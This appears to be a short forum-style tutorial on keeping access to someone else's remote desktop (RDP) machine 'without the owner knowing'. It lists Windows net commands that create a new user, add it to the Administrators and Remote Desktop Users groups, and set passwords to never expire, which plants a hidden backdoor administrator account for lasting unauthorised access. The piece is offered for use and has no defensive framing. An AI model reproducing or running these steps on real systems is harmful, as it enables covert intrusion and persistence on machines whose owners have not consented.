This is a small tutorial from me on how to use RDP's without the owner knowing or to make is last longer.
Go to command prompt and follow this following.
net user username password /add
net localgroup Administrators username /add
net localgroup "Remote Desktop Users" username /add
net accounts /maxpwage:unlimited
the press enter.
account will be create for your new user and will be able to use it as login.
